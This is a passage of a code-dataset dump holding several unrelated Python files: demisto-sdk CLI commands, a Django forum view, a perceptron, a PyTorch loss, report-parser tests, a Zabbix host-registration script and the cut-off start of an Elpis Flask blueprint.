      return generate_script_doc(input_path=input_path, output=output_path, 
examples=examples,\n permissions=permissions,\n limitations=limitations, insecure=insecure, verbose=verbose)\n elif file_type == FileType.PLAYBOOK:\n return generate_playbook_doc(input_path=input_path, output=output_path, permissions=permissions,\n limitations=limitations, verbose=verbose)\n else:\n print_error(f'File type {file_type.value} is not supported.')\n return 1\n\n\n# ====================== create-id-set ====================== #\n@main.command(hidden=True)\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '-i', '--input',\n help='Input file path, the default is the content repo.',\n default=''\n)\n@click.option(\n \"-o\", \"--output\",\n help=\"Output file path, the default is the Tests directory.\",\n default=''\n)\ndef create_id_set(**kwargs):\n \"\"\"Create the content dependency tree by ids.\"\"\"\n check_configuration_file('create-id-set', kwargs)\n id_set_creator = IDSetCreator(**kwargs)\n id_set_creator.create_id_set()\n\n\n# ====================== merge-id-sets ====================== #\n@main.command(hidden=True)\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '-i1', '--id-set1',\n help='First id_set.json file path',\n required=True\n)\n@click.option(\n '-i2', '--id-set2',\n help='Second id_set.json file path',\n required=True\n)\n@click.option(\n '-o', '--output',\n help='File path of the united id_set',\n required=True\n)\ndef merge_id_sets(**kwargs):\n \"\"\"Merge two id_sets\"\"\"\n check_configuration_file('merge-id-sets', kwargs)\n first = kwargs['id_set1']\n second = kwargs['id_set2']\n output = kwargs['output']\n\n _, duplicates = merge_id_sets_from_files(\n first_id_set_path=first,\n second_id_set_path=second,\n output_id_set_path=output\n )\n if duplicates:\n print_error(f'Failed to merge ID sets: {first} with {second}, '\n f'there are entities with ID: {duplicates} that exist in both ID sets')\n sys.exit(1)\n\n\n# ====================== update-release-notes =================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n \"-i\", \"--input\", help=\"The relative path of the content pack. For example Packs/Pack_Name\"\n)\n@click.option(\n '-u', '--update_type', help=\"The type of update being done. 
[major, minor, revision, maintenance, documentation]\",\n    type=click.Choice(['major', 'minor', 'revision', 'maintenance', 'documentation'])\n)\n@click.option(\n    '-v', '--version', help=\"Bump to a specific version.\"\n)\n@click.option(\n    '--all', help=\"Update all changed packs\", is_flag=True\n)\n@click.option(\n    '--text', help=\"Text to add to all of the release notes files\",\n)\n@click.option(\n    '--prev-ver', help='Previous branch or SHA1 commit to run checks against.'\n)\n@click.option(\n    \"--pre_release\", help=\"Indicates that this change should be designated a pre-release version.\",\n    is_flag=True)\n@click.option(\n    \"-idp\", \"--id-set-path\", help=\"The path of the id-set.json used for APIModule updates.\",\n    type=click.Path(resolve_path=True))\ndef update_release_notes(**kwargs):\n    \"\"\"Auto-increment pack version and generate release notes template.\"\"\"\n    check_configuration_file('update-release-notes', kwargs)\n    _pack = kwargs.get('input')\n    update_type = kwargs.get('update_type')\n    pre_release: bool = kwargs.get('pre_release', False)\n    is_all = kwargs.get('all')\n    text: str = kwargs.get('text', '')\n    specific_version = kwargs.get('version')\n    id_set_path = kwargs.get('id_set_path')\n    prev_ver = kwargs.get('prev_ver')\n    existing_rn_version = ''\n    # _pack can be either a path or a pack name, thus we extract the pack name from the path if needed.\n    if _pack and is_all:\n        print_error(\"Please remove the --all flag when specifying only one pack.\")\n        sys.exit(0)\n    print(\"Starting to update release notes.\")\n    if _pack and '/' in _pack:\n        _pack = get_pack_name(_pack)\n    try:\n        validate_manager = ValidateManager(skip_pack_rn_validation=True, prev_ver=prev_ver, silence_init_prints=True)\n        validate_manager.setup_git_params()\n        modified, added, changed_meta_files, old = validate_manager.get_changed_files_from_git()\n        _packs = get_packs(modified).union(get_packs(old)).union(\n            get_packs(added))\n    except (git.InvalidGitRepositoryError, git.NoSuchPathError, FileNotFoundError):\n        print_error(\"You are not running `demisto-sdk update-release-notes` command in the content repository.\\n\"\n                    \"Please run `cd content` from your terminal and run the command again\")\n        sys.exit(1)\n\n    packs_existing_rn = {}\n    for file_path in added:\n        if 'ReleaseNotes' in file_path:\n            packs_existing_rn[get_pack_name(file_path)] = file_path\n\n    filtered_modified = filter_files_by_type(modified, skip_file_types=SKIP_RELEASE_NOTES_FOR_TYPES)\n    filtered_added = filter_files_by_type(added, skip_file_types=SKIP_RELEASE_NOTES_FOR_TYPES)\n\n    if _pack and API_MODULES_PACK in _pack:\n        # case: ApiModules\n        update_api_modules_dependents_rn(_pack, pre_release, update_type, added, modified,\n                                         id_set_path=id_set_path, text=text)\n\n    # create release notes:\n    if _pack:\n        _packs = {_pack}\n    elif not is_all and len(_packs) > 1:\n        # case: multiple packs\n        pack_list = ', '.join(_packs)\n        print_error(f\"Detected changes in the following packs: {pack_list.rstrip(', ')}\\n\"\n                    f\"To update release notes in a specific pack, please use the -i parameter \"\n                    f\"along with the pack name.\")\n        sys.exit(0)\n    if _packs:\n        for pack in _packs:\n            if pack in packs_existing_rn and update_type is None:\n                existing_rn_version = packs_existing_rn[pack]\n            elif pack in packs_existing_rn and update_type is not None:\n                print_error(f\"New release notes file already found for {pack}. 
\"\n f\"Please update manually or run `demisto-sdk update-release-notes \"\n f\"-i {pack}` without specifying the update_type.\")\n continue\n\n pack_modified = filter_files_on_pack(pack, filtered_modified)\n pack_added = filter_files_on_pack(pack, filtered_added)\n pack_old = filter_files_on_pack(pack, old)\n\n # default case:\n if pack_modified or pack_added or pack_old:\n update_pack_rn = UpdateRN(pack_path=f'Packs/{pack}', update_type=update_type,\n modified_files_in_pack=pack_modified.union(pack_old), pre_release=pre_release,\n added_files=pack_added, specific_version=specific_version, text=text,\n existing_rn_version_path=existing_rn_version)\n updated = update_pack_rn.execute_update()\n # if new release notes were created and if previous release notes existed, remove previous\n if updated and update_pack_rn.should_delete_existing_rn:\n os.unlink(packs_existing_rn[pack])\n\n else:\n print_warning(f'Either no changes were found in {pack} pack '\n f'or the changes found should not be documented in the release notes file '\n f'If relevant changes were made, please commit the changes and rerun the command')\n else:\n print_warning('No changes that require release notes were detected. If such changes were made, '\n 'please commit the changes and rerun the command')\n sys.exit(0)\n\n\n# ====================== find-dependencies ====================== #\n@main.command()\n@click.option(\n \"-i\", \"--input\", help=\"Pack path to find dependencies. For example: Pack/HelloWorld\", required=True,\n type=click.Path(exists=True, dir_okay=True))\n@click.option(\n \"-idp\", \"--id-set-path\", help=\"Path to id set json file.\", required=False)\n@click.option(\n \"--no-update\", help=\"Use to find the pack dependencies without updating the pack metadata.\", required=False,\n is_flag=True)\n@click.option('-v', \"--verbose\", help=\"Whether to print the log to the console.\", required=False,\n is_flag=True)\n@click.option(\"--use-pack-metadata\", help=\"Whether to update the dependencies from the pack metadata.\", required=False,\n is_flag=True)\ndef find_dependencies(**kwargs):\n \"\"\"Find pack dependencies and update pack metadata.\"\"\"\n check_configuration_file('find-dependencies', kwargs)\n update_pack_metadata = not kwargs.get('no_update')\n input_path: Path = kwargs[\"input\"] # To not shadow python builtin `input`\n verbose = kwargs.get('verbose', False)\n id_set_path = kwargs.get('id_set_path', '')\n use_pack_metadata = kwargs.get('use_pack_metadata', False)\n try:\n assert \"Packs/\" in str(input_path)\n pack_name = str(input_path).replace(\"Packs/\", \"\")\n assert \"/\" not in str(pack_name)\n except AssertionError:\n print_error(\"Input path is not a pack. 
For example: Packs/HelloWorld\")\n sys.exit(1)\n try:\n PackDependencies.find_dependencies(\n pack_name=pack_name,\n id_set_path=str(id_set_path),\n verbose=verbose,\n update_pack_metadata=update_pack_metadata,\n use_pack_metadata=use_pack_metadata\n )\n except ValueError as exp:\n print_error(str(exp))\n\n\n# ====================== postman-codegen ====================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '-i', '--input',\n help='The Postman collection 2.1 JSON file',\n required=True, type=click.File())\n@click.option(\n '-o', '--output',\n help='The output directory to save the config file or the integration',\n type=click.Path(dir_okay=True, exists=True),\n default=Path('.'),\n show_default=True\n)\n@click.option(\n '-n', '--name',\n help='The output integration name')\n@click.option(\n '-op', '--output-prefix',\n help='The global integration output prefix. By default it is the product name.'\n)\n@click.option(\n '-cp', '--command-prefix',\n help='The prefix for each command in the integration. By default is the product name in lower case'\n)\n@click.option(\n '--config-out',\n help='Used for advanced integration customisation. Generates a config json file instead of integration.',\n is_flag=True\n)\n@click.option(\n '--verbose', help='Print debug level logs', is_flag=True)\ndef postman_codegen(\n input: IO,\n output: Path,\n name: str,\n output_prefix: str,\n command_prefix: str,\n config_out: bool,\n verbose: bool\n):\n \"\"\"Generates a Cortex XSOAR integration given a Postman collection 2.1 JSON file.\"\"\"\n if verbose:\n logger = logging_setup(verbose=3)\n else:\n logger = logging.getLogger('demisto-sdk')\n\n config = postman_to_autogen_configuration(\n collection=json.load(input),\n name=name,\n command_prefix=command_prefix,\n context_path_prefix=output_prefix\n )\n\n if config_out:\n path = output / f'config-{config.name}.json'\n with open(path, mode='w+') as f:\n json.dump(config.to_dict(), f, indent=4)\n logger.info(f'Config file generated at:\\n{os.path.abspath(path)}')\n else:\n # generate integration yml\n config.generate_integration_package(output, is_unified=True)\n\n\n# ====================== generate-integration ====================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '-i', '--input',\n help='config json file produced by commands like postman-codegen and openapi-codegen',\n required=True,\n type=click.File()\n)\n@click.option(\n '-o', '--output',\n help='The output directory to save the integration package',\n type=click.Path(dir_okay=True, exists=True),\n default=Path('.')\n)\n@click.option(\n '--verbose',\n help='Print debug level logs',\n is_flag=True\n)\ndef generate_integration(input: IO, output: Path, verbose: bool):\n \"\"\"Generates a Cortex XSOAR integration from a config json file,\n which is generated by commands like postman-codegen\n \"\"\"\n if verbose:\n logging_setup(verbose=3)\n\n config_dict = json.load(input)\n config = IntegrationGeneratorConfig(**config_dict)\n\n config.generate_integration_package(output, True)\n\n\n# ====================== openapi-codegen ====================== #\n@main.command(short_help='''Generates a Cortex XSOAR integration given an OpenAPI specification file.''')\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '-i', '--input_file', help='The swagger file to load in JSON format', required=True)\n@click.option(\n '-cf', '--config_file', help='The integration configuration file. 
It is created in the first run of the command',\n required=False)\n@click.option(\n '-n', '--base_name', help='The base filename to use for the generated files', required=False)\n@click.option(\n '-o', '--output_dir', help='Directory to store the output in (default is current working directory)',\n required=False)\n@click.option(\n '-pr', '--command_prefix', help='Add a prefix to each command in the code', required=False)\n@click.option(\n '-c', '--context_path', help='Context output path', required=False)\n@click.option(\n '-u', '--unique_keys', help='Comma separated unique keys to use in context paths (case sensitive)', required=False)\n@click.option(\n '-r', '--root_objects', help='Comma separated JSON root objects to use in command outputs (case sensitive)',\n required=False)\n@click.option(\n '-v', '--verbose', is_flag=True, help='Be verbose with the log output')\n@click.option(\n '-f', '--fix_code', is_flag=True, help='Fix the python code using autopep8')\n@click.option(\n '-a', '--use_default', is_flag=True, help='Use the automatically generated integration configuration'\n ' (Skip the second run).')\ndef openapi_codegen(**kwargs):\n \"\"\"Generates a Cortex XSOAR integration given an OpenAPI specification file.\n In the first run of the command, an integration configuration file is created, which can be modified.\n Then, the command is run a second time with the integration configuration to generate the actual integration files.\n \"\"\"\n check_configuration_file('openapi-codegen', kwargs)\n if not kwargs.get('output_dir'):\n output_dir = os.getcwd()\n else:\n output_dir = kwargs['output_dir']\n\n # Check the directory exists and if not, try to create it\n if not os.path.exists(output_dir):\n try:\n os.mkdir(output_dir)\n except Exception as err:\n tools.print_error(f'Error creating directory {output_dir} - {err}')\n sys.exit(1)\n if not os.path.isdir(output_dir):\n tools.print_error(f'The directory provided \"{output_dir}\" is not a directory')\n sys.exit(1)\n\n input_file = kwargs['input_file']\n base_name = kwargs.get('base_name')\n if base_name is None:\n base_name = 'GeneratedIntegration'\n\n command_prefix = kwargs.get('command_prefix')\n if command_prefix is None:\n command_prefix = '-'.join(base_name.split(' ')).lower()\n\n context_path = kwargs.get('context_path')\n if context_path is None:\n context_path = base_name.replace(' ', '')\n\n unique_keys = kwargs.get('unique_keys', '')\n if unique_keys is None:\n unique_keys = ''\n\n root_objects = kwargs.get('root_objects', '')\n if root_objects is None:\n root_objects = ''\n\n verbose = kwargs.get('verbose', False)\n fix_code = kwargs.get('fix_code', False)\n\n configuration = None\n if kwargs.get('config_file'):\n try:\n with open(kwargs['config_file'], 'r') as config_file:\n configuration = json.load(config_file)\n except Exception as e:\n print_error(f'Failed to load configuration file: {e}')\n\n click.echo('Processing swagger file...')\n integration = OpenAPIIntegration(input_file, base_name, command_prefix, context_path,\n unique_keys=unique_keys, root_objects=root_objects,\n verbose=verbose, fix_code=fix_code, configuration=configuration)\n\n integration.load_file()\n if not kwargs.get('config_file'):\n integration.save_config(integration.configuration, output_dir)\n tools.print_success(f'Created configuration file in {output_dir}')\n if not kwargs.get('use_default', False):\n config_path = os.path.join(output_dir, f'{base_name}.json')\n command_to_run = f'demisto-sdk openapi-codegen -i \"{input_file}\" -cf 
\"{config_path}\" -n \"{base_name}\" ' \\\n                         f'-o \"{output_dir}\" -pr \"{command_prefix}\" -c \"{context_path}\"'\n        if unique_keys:\n            command_to_run = command_to_run + f' -u \"{unique_keys}\"'\n        if root_objects:\n            command_to_run = command_to_run + f' -r \"{root_objects}\"'\n        if verbose:\n            command_to_run = command_to_run + ' -v'\n        if fix_code:\n            command_to_run = command_to_run + ' -f'\n\n        click.echo(f'Run the command again with the created configuration file (after a review): {command_to_run}')\n        sys.exit(0)\n\n    if integration.save_package(output_dir):\n        tools.print_success(f'Successfully finished generating integration code and saved it in {output_dir}')\n    else:\n        tools.print_error(f'There was an error creating the package in {output_dir}')\n        sys.exit(1)\n\n\n# ====================== test-content command ====================== #\n@main.command(\n    short_help='''Creates incidents for selected test-playbooks and gives a report about the results''',\n    hidden=True\n)\n@click.help_option(\n    '-h', '--help'\n)\n@click.option(\n    '-k', '--api-key', help='The Demisto API key for the server', required=True)\n@click.option(\n    '-s', '--server', help='The server URL to connect to')\n@click.option(\n    '-c', '--conf', help='Path to content conf.json file', required=True)\n@click.option(\n    '-e', '--secret', help='Path to content-test-conf conf.json file')\n@click.option(\n    '-n', '--nightly', type=bool, help='Run nightly tests')\n@click.option(\n    '-t', '--slack', help='The token for slack', required=True)\n@click.option(\n    '-a', '--circleci', help='The token for circleci', required=True)\n@click.option(\n    '-b', '--build-number', help='The build number', required=True)\n@click.option(\n    '-g', '--branch-name', help='The current content branch name', required=True)\n@click.option(\n    '-i', '--is-ami', type=bool, help='Is AMI build or not', default=False)\n@click.option(\n    '-m',\n    '--mem-check',\n    type=bool,\n    help='Should trigger memory checks or not. 
The slack channel to check the data is: '\n         'dmst_content_nightly_memory_data',\n    default=False)\n@click.option(\n    '-d',\n    '--server-version',\n    help='Which server version to run the tests on (valid only when using AMI)',\n    default=\"NonAMI\")\ndef test_content(**kwargs):\n    \"\"\"Configure instances for the integration needed to run tests_to_run tests.\n    Run the test module on each integration.\n    Create an investigation for each test.\n    Run the test playbook on the created investigation, using a mock if possible.\n    Collect the results and give a report.\n    \"\"\"\n    check_configuration_file('test-content', kwargs)\n    execute_test_content(**kwargs)\n\n\n# ====================== doc-review ====================== #\n@main.command()\n@click.help_option(\n    '-h', '--help'\n)\n@click.option(\n    '-i', '--input', type=str, help='The path to the file to check')\n@click.option(\n    '--no-camel-case', is_flag=True, help='Whether to check CamelCase words', default=False)\n@click.option(\n    '--known-words', type=str, help=\"The path to a file containing additional known words\"\n)\n@click.option(\n    '--always-true', is_flag=True, help=\"Never fail the command, even if misspelled words are found\"\n)\n@click.option(\n    '--expand-dictionary', is_flag=True, help=\"Whether to expand the base dictionary to include more words - \"\n                                              \"will download 'brown' corpus from nltk package\"\n)\n@click.option(\n    '--templates', is_flag=True, help=\"Whether to print release notes templates\"\n)\n@click.option(\n    '-g', '--use-git', is_flag=True, help=\"Use git to identify the relevant changed files, \"\n                                          \"will be used by default if '-i' and '--templates' are not set\"\n)\n@click.option(\n    '--prev-ver', type=str, help=\"The branch against which changes will be detected \"\n                                 \"if '-g' flag is set. Default is 'demisto/master'\"\n)\n@click.option(\n    '-rn', '--release-notes', is_flag=True, help=\"Will run only on release notes files\"\n)\ndef doc_review(**kwargs):\n    \"\"\"Check the spelling in .md and .yml files as well as review release notes\"\"\"\n    doc_reviewer = DocReviewer(\n        file_path=kwargs.get('input'),\n        known_words_file_path=kwargs.get('known_words'),\n        no_camel_case=kwargs.get('no_camel_case'),\n        no_failure=kwargs.get('always_true'),\n        expand_dictionary=kwargs.get('expand_dictionary'),\n        templates=kwargs.get('templates'),\n        use_git=kwargs.get('use_git'),\n        prev_ver=kwargs.get('prev_ver'),\n        release_notes_only=kwargs.get('release_notes'),\n    )\n    result = doc_reviewer.run_doc_review()\n    if result:\n        sys.exit(0)\n\n    sys.exit(1)\n\n\n# ====================== integration-diff ====================== #\n@main.command(name=\"integration-diff\",\n              help='''Given two versions of an integration, check that everything in the old integration is covered in\n              the new integration''')\n@click.help_option(\n    '-h', '--help'\n)\n@click.option(\n    '-n', '--new', type=str, help='The path to the new version of the integration', required=True)\n@click.option(\n    '-o', '--old', type=str, help='The path to the old version of the integration', required=True)\ndef integration_diff(**kwargs):\n    \"\"\"\n    Checks for differences between two versions of an integration, and verifies that the new version covers the old version.\n    \"\"\"\n\n    integration_diff_detector = IntegrationDiffDetector(kwargs.get('new', ''), kwargs.get('old', ''))\n    result = integration_diff_detector.check_diff()\n\n    if result:\n        sys.exit(0)\n\n    sys.exit(1)\n\n\n@main.resultcallback()\ndef exit_from_program(result=0, **kwargs):\n    sys.exit(result)\n\n\n# todo: add download from demisto command\n\n\nif 
__name__ == '__main__':\n sys.exit(main())\n","sub_path":"demisto_sdk/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":63825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"32007255","text":"from django.http import HttpResponse\nfrom forum.controllers import Answer as AnswerController\nfrom django.views.decorators.csrf import csrf_exempt\n\n@csrf_exempt\ndef add(request):\n\tparams = request.POST #request.body\n\tif (not(\"username\" in request.session.keys())):\n\t\treturn HttpResponse(\"Unauthenticated user\", status = 401)\n\n\tauthor = request.session['username']\n\tanswer = params['answer']\n\tquestion = params['question']\n\n\tsuccess, message = AnswerController.add(answer, question, author)\n\tif (success == 0):\n\t\treturn HttpResponse(\"Answer added successfully\", status=201)\n\telif(success == 1):\n\t\treturn HttpResponse(message, status = 400) # question/asker id is invalid.\n\telse:\n\t\treturn HttpResponse(\"Couldn't serve request, try again later!\", status = 500) ","sub_path":"forum/views/Answer.py","file_name":"Answer.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"180183655","text":"\"\"\"\nauthor : Vishal\n\n\"\"\"\n\nimport numpy as np\nfrom tqdm import tqdm\nimport logging\n\nclass Perceptron:\n \n def __init__(self,eta,epochs):\n np.random.seed(101)\n self.weights = np.random.randn(3) * 1e-4 ## to make the weight small while initialization\n logging.info(f\"Initial weights before training : \\n{self.weights}\")\n self.eta = eta\n self.epochs = epochs\n \n def activationFunction(self,inputs,weights):\n z = np.dot(inputs,weights)\n return np.where(z>0,1,0)\n \n def fit(self,x,y):\n self.x = x\n self.y = y\n\n x_with_bias = np.c_[self.x, -np.ones(( len(self.x),1 ))]\n logging.info(f\"x with bias: \\n{x_with_bias}\")\n\n for epoch in tqdm(range(self.epochs),total=self.epochs,desc=\"training the model\"):\n logging.info(\"--\"*10)\n logging.info(f\"for epoch: {epoch}\")\n logging.info(\"--\"*10)\n\n y_hat = self.activationFunction(x_with_bias,self.weights) ## forward propagation\n logging.info(f\"predicted value after forward pass: \\n{y_hat}\")\n\n self.error = self.y - y_hat\n logging.info(f\"error: \\n{self.error}\")\n\n self.weights = self.weights + self.eta * np.dot(x_with_bias.T,self.error) ## backward propagation\n logging.info(f\"updated weights after epoch:\\n{epoch}/{self.epochs} : \\n{self.weights}\")\n logging.info(\"##\"*10)\n\n def predict(self,x):\n x_with_bias = np.c_[x, -np.ones((len(x),1))]\n return self.activationFunction(x_with_bias,self.weights)\n\n\n def total_loss(self):\n total_loss = np.sum(self.error)\n logging.info(f\"total loss: {total_loss}\")\n return total_loss\n","sub_path":"src/perceptron_vb/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"173550925","text":"from .Loss import Loss\nfrom .utils import give_net\nimport numpy as np\nfrom torchvision.models import vgg19\nimport torch\nfrom .conf import DEVICE\n\n\nclass GeometricLoss(Loss):\n def __init__(self, *args, **kwargs):\n super(GeometricLoss, self).__init__()\n self.net = give_net(vgg19(True).features[:12], 12).to(DEVICE)\n\n def forward(self, output, target, *args, **kwargs):\n output = self.net(output)\n target = self.net(target)\n\n vectorH = torch.Tensor([i for i 
in np.arange(output.size()[-1])]).to(DEVICE)\n vectorW = torch.Tensor([i for i in np.arange(output.size()[-2])]).to(DEVICE)\n\n d_o = output @ vectorH / output.sum()\n w_o = vectorW @ output / output.sum()\n d_t = target @ vectorH / target.sum()\n w_t = vectorW @ target / target.sum()\n\n return ((d_t - d_o) ** 2 + (w_t - w_o) ** 2).sum()\n","sub_path":"RaGAN/GL.py","file_name":"GL.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"267523384","text":"import os\nimport sys\nimport unittest\nimport pandas as pd\n\nfrom unittest.mock import patch\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\")))\n\nfrom utils import mocks # noqa: E402\nfrom reportforce import Reportforce # noqa: E402\nfrom reportforce.helpers.parsers import get_columns_labels # noqa: E402\n\nmock_metadata = mocks.get_json(\"analytics_matrix_metadata\")\nmock_report = mocks.get_json(\"analytics_matrix\")\n\n\nindices = pd.MultiIndex.from_tuples(\n [\n (\"Supervisor1\", \"Worker1\"),\n (\"Supervisor1\", \"Worker2\"),\n (\"Supervisor2\", \"Worker3\"),\n (\"Supervisor2\", \"Worker4\"),\n (\"Supervisor2\", \"Worker5\"),\n (\"Supervisor2\", \"Worker6\"),\n (\"Supervisor2\", \"Worker7\"),\n (\"Supervisor2\", \"Worker8\"),\n (\"Supervisor3\", \"Worker9\"),\n (\"Supervisor4\", \"Worker10\"),\n (\"Supervisor4\", \"Worker11\"),\n (\"Supervisor4\", \"Worker12\"),\n ],\n names=[\"Supervisor\", \"Worker\"],\n)\n\ncolumns = pd.MultiIndex.from_tuples(\n [\n (\"Row Sum\", \"Product\", \"DeliveryDay1\"),\n (\"Row Sum\", \"Product\", \"DeliveryDay2\"),\n (\"Row Sum\", \"Product\", \"DeliveryDay3\"),\n (\"Row Sum\", \"Product\", \"DeliveryDay4\"),\n ],\n names=[\"\", \"Product\", \"Delivery Day\"],\n)\n\nexpected_df = pd.DataFrame(\n [\n [\"0_0!0_0\", \"0_0!0_1\", \"0_0!0_2\", \"0_0!0_3\"],\n [\"0_1!0_0\", \"0_1!0_1\", \"0_1!0_2\", \"0_1!0_3\"],\n [\"1_0!0_0\", \"1_0!0_1\", \"1_0!0_2\", \"1_0!0_3\"],\n [\"1_1!0_0\", \"1_1!0_1\", \"1_1!0_2\", \"1_1!0_3\"],\n [\"1_2!0_0\", \"1_2!0_1\", \"1_2!0_2\", \"1_2!0_3\"],\n [\"1_3!0_0\", \"1_3!0_1\", \"1_3!0_2\", \"1_3!0_3\"],\n [\"1_4!0_0\", \"1_4!0_1\", \"1_4!0_2\", \"1_4!0_3\"],\n [\"1_5!0_0\", \"1_5!0_1\", \"1_5!0_2\", \"1_5!0_3\"],\n [\"2_0!0_0\", \"2_0!0_1\", \"2_0!0_2\", \"2_0!0_3\"],\n [\"3_0!0_0\", \"3_0!0_1\", \"3_0!0_2\", \"3_0!0_3\"],\n [\"3_1!0_0\", \"3_1!0_1\", \"3_1!0_2\", \"3_1!0_3\"],\n [\"3_2!0_0\", \"3_2!0_1\", \"3_2!0_2\", \"3_2!0_3\"],\n ],\n index=indices,\n columns=columns,\n)\n\n\nclass TestMatrixReport(unittest.TestCase):\n maxDiff = None\n\n def setUp(self):\n mocks.mock_get_metadata(\"analytics_matrix_metadata\").start()\n mocks.mock_login().start()\n\n self.rf = Reportforce(\"foo@bar.com\", \"1234\", \"XXX\")\n\n @patch.object(Reportforce.session, \"post\")\n def test_dataframe(self, post):\n \"\"\"Test if it returns the expected DataFrame.\"\"\"\n\n post().json.return_value = mock_report\n\n df = self.rf.get_report(\"ReportID\")\n pd.testing.assert_frame_equal(expected_df, df)\n\n @patch.object(Reportforce.session, \"post\")\n def test_empty_matrix(self, post):\n \"\"\"Test if returns an empty DataFrame when the matrix is empty.\"\"\"\n\n mock_factmap = {\n \"T!T\": {\"aggregates\": {\"label\": \"label\", \"value\": \"value\"}, \"rows\": []}\n }\n\n with patch.dict(mock_report, mock_report, factMap=mock_factmap):\n post().json.return_value = mock_report\n df = self.rf.get_report(\"ReportID\")\n\n self.assertTrue(df.empty)\n\n def 
test_get_columns_labels_of_a_matrix(self):\n \"\"\"Test get columns labels of a matrix.\"\"\"\n\n test = get_columns_labels(mock_report)\n expected = {\n \"Delivery Day\": \"Delivery Day\",\n \"Product\": \"Product\",\n \"Supervisor\": \"Supervisor\",\n \"Worker\": \"Worker\",\n }\n self.assertDictEqual(test, expected)\n\n def tearDown(self):\n patch.stopall()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n\n# vi: nowrap\n","sub_path":"tests/test_matrix.py","file_name":"test_matrix.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"418785992","text":"#!/usr/bin/env python\nimport os, requests, json, sys, socket, fcntl, struct\nfrom requests.auth import HTTPBasicAuth\n\nzabbix_server = \"192.168.56.101\"\nzabbix_api_admin_name = \"Admin\"\nzabbix_api_admin_password = \"zabbix\"\nhostname = socket.gethostname()\n\n\ndef post(request):\n headers = {'content-type': 'application/json'}\n return requests.post(\n \"http://\" + zabbix_server + \"/api_jsonrpc.php\",\n data=json.dumps(request),\n headers=headers,\n auth=HTTPBasicAuth(zabbix_api_admin_name, zabbix_api_admin_password)\n )\n\ndef get_ip_address(ifname):\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n return socket.inet_ntoa(fcntl.ioctl(\n s.fileno(),\n 0x8915, # SIOCGIFADDR\n struct.pack('256s', ifname[:15])\n )[20:24])\n\nip = get_ip_address('enp0s8')\n\n\n\n\nauth_token = post({\n \"jsonrpc\": \"2.0\",\n \"method\": \"user.login\",\n \"params\": {\n \"user\": zabbix_api_admin_name,\n \"password\": zabbix_api_admin_password\n },\n \"auth\": None,\n \"id\": 0}\n).json()[\"result\"]\n\n#####################new group\ndef create_group():\n return post({\n \"jsonrpc\": \"2.0\",\n \"method\": \"hostgroup.create\",\n \"params\": {\n \"name\": \"CloudHosts\"\n\n },\n\t\"auth\": auth_token,\n \"id\": 1\n }).json()[\"result\"][\"groupids\"][0]\n\n###########################check group\n\ndef if_group():\n return post({\n\t\"jsonrpc\": \"2.0\",\n \"method\": \"hostgroup.get\",\n \"params\": {\n \"output\": \"extend\",\n \"filter\": {\n \"name\": [\n \"CloudHosts\"\n ]\n }\n },\n\t\"auth\": auth_token,\n\n \"id\": 1\n }).json()[\"result\"][0][\"groupid\"]\n\n\ntry:\n#\tif_group()\n\tidid = if_group()\nexcept:\n#\tif_group()\n\tidid = create_group()\n \nprint(idid)\n\n\n\n \n\ndef register_host(hostname, ip,myid):\n post({\n\t\"jsonrpc\": \"2.0\",\n \"method\": \"host.create\",\n \"params\": {\n \"host\": hostname,\n \"templates\": [{\n \"templateid\": \"10001\"\n }],\n \"interfaces\": [{\n \"type\": 1,\n \"main\": 1,\n \"useip\": 1,\n \"ip\": ip,\n \"dns\": \"\",\n \"port\": \"10050\"\n }],\n \"groups\": [\n {\"groupid\": \"1\"},\n {\"groupid\": \"2\"},\n {\"groupid\": myid}\n ]\n\t},\n\t\"auth\": auth_token,\n \"id\": 1\n })\n\nregister_host(hostname, ip, idid)\n\n","sub_path":"zabbix2.py","file_name":"zabbix2.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"54405045","text":"from flask import request, current_app as app, jsonify\nfrom ..blueprint import Blueprint\nimport subprocess\nfrom elpis.wrappers.objects.interface import KaldiInterface\nfrom elpis.wrappers.objects.model import Model\nfrom elpis.wrappers.objects.dataset import Dataset\nfrom elpis.wrappers.objects.pron_dict import PronDict\n\nfrom pathlib import Path\n\nbp = Blueprint(\"model\", __name__, url_prefix=\"/model\")\n\n\ndef run(cmd: str) -> str:\n import shlex\n 
